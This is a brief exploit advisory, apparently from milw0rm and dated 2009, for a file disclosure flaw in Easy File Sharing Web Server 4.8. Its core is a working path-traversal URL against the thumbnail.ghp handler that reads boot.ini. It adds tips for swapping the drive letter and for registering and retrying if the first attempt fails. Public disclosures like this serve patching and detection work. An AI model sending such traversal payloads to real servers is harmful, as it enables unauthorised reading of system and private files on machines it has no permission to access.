18 lines
No EOL
598 B
Text
18 lines
No EOL
598 B
Text
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|
Easy File Sharing Web Server File Disclouse Vulnerability
|
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|
Program: Easy File Sharing Web Server
|
|
Version: 4.8
|
|
Download: http://www.sharing-file.com/efssetup.exe
|
|
Found by Mountassif Moad
|
|
www.v4-team.com
|
|
|
|
-- Bug --
|
|
Exploit :
|
|
|
|
http://127.0.0.1/disk_c/thumbnail.ghp?vfolder=../../.././/./../../boot.ini
|
|
if you have a hard disk like d or f you change disk_c by disk_d or disk_f some host dont have this
|
|
and if dont work in first test try to register and test another time
|
|
Tested on win xp SP 2 fr
|
|
|
|
# milw0rm.com [2009-03-04] |